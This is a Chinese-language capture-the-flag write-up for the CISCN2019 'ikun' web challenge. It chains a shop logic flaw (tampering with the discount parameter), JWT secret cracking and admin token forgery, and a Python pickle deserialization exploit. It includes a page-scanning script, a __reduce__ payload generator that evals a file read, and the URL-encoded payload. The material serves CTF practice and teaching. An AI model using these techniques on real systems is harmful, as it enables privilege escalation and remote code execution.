[CISCN2019 华北赛区 Day1 Web2]ikun
本题:电商平台逻辑漏洞+JWT伪造+python pickle反序列化 三个没用过的知识点…
先注册
这里提示要lv6
可以翻页,翻页后发现时在url中get传参页数
等级牌lv2对应的就是lv2
所以只要找lv6就可以了,可以用python写一个脚本来访问,检测返回的html中是否包含lv6.png
import requests
url="http://fa909550-df79-40db-b45e-1e6912103ebe.node4.buuoj.cn/shop?page="
for i in range(0,999):
r=requests.get(url+str(i))
if 'lv6.png' in r.text:
print (url+str(i))
break
page=181有lv6
直接访问
钱显然是不够的,抓包看一下
这里的三个参数,商品id,商品价格,折扣,修改价格不行,修改折扣成功
会重定向到/b1g_m4mber
提示只允许admin访问
他采用了JWT验证身份,
JWT可以说是session验证的一种替代,能大大缓解服务器的压力
这段JWT验证的数据可以解码查看一下
密码是 1Kun
解密工具:c-jwt-cracker 直接在github可以找到
用docker的方法貌似已经失效,用官方文档提供的另外方法可以
在线编辑工具https://jwt.io/
用户名改成admin,密码改成刚破解出的1Kun,复制左边的,替换bp包中的JWT,即可访问。
查看源代码,发现hint,可以下载网站源码
然后审计
在setting.py发现hint,unicode转中文后的结果提示有个后门在lv6中
定位到admin.py的反序列化操作,
为什么后门暗指了反序列化啊?但是确实没有别的可以当后门的东西,而且lv6重定向的网站也确实是这个admin中对应的提交参数的表单
import tornado.web
from sshop.base import BaseHandler
import pickle
import urllib
class AdminHandler(BaseHandler):
@tornado.web.authenticated
用户身份验证
def get(self, *args, **kwargs):
if self.current_user == "admin":
return self.render('form.html', res='This is Black Technology!', member=0)
else:
return self.render('no_ass.html')
@tornado.web.authenticated
反序列化的漏洞位置
def post(self, *args, **kwargs):
try:
become = self.get_argument('become')
p = pickle.loads(urllib.unquote(become))
#urllib.unquote:将存入的字典参数编码为URL查询字符串,即转换形式pickle.loads(bytes_object): 从字节对象中读取被封装的对象,并返回
return self.render('form.html', res=p, member=1)
except:
return self.render('form.html', res='This is Black Technology!', member=0)
(1)pickle.dump(obj, file, [,protocol])
函数的功能:将obj对象序列化存入已经打开的file中。
参数讲解:
obj:想要序列化的obj对象。file:文件名称。
protocol:序列化使用的协议。如果该项省略,则默认为0。如果为负值或HIGHEST_PROTOCOL,则使用最高的协议版本。
(2)pickle.load(file)
函数的功能:将file中的对象序列化读出。 参数讲解:
file:文件名称。
(3)pickle.dumps(obj[, protocol])
函数的功能:将obj对象序列化为string形式,而不是存入文件中。
参数讲解:
obj:想要序列化的obj对象。
protocal:如果该项省略,则默认为0。如果为负值或HIGHEST_PROTOCOL,则使用最高的协议版本。
(4)pickle.loads(string)
函数的功能:从string中读出序列化前的obj对象。
参数讲解:
string:文件名称。
【注】 dump() 与 load() 相比 dumps() 和 loads() 还有另一种能力:dump()函数能一个接着一个地将几个对象序列化存储到同一个文件中,随后调用load()来以同样的顺序反序列化读出这些对象。而在__reduce__方法里面我们就进行读取flag.txt文件,并将该类序列化之后进行URL编码
用这个源码生成payload然后become参数进行传参,得到flag
import pickle
import urllib
class payload(object):
def __reduce__(self):
return (eval, ("open('/flag.txt','r').read()",))
a = pickle.dumps(payload())
a = urllib.quote(a)
print (a)
``
c__builtin__%0Aeval%0Ap0%0A%28S%22open%28%27/flag.txt%27%2C%27r%27%29.read%28%29%22%0Ap1%0Atp2%0ARp3%0A.
注:这个反序列化第一次拿到flag到最后写完wp,被困了两个小时,重启了四次靶机,最后总结的规律是第一次如果成功利用反序列化,之后重放成功的攻击流量就会403,如果第一次反序列化没成功,第二次发送正确的流量包,不会得到flag,只会到达这里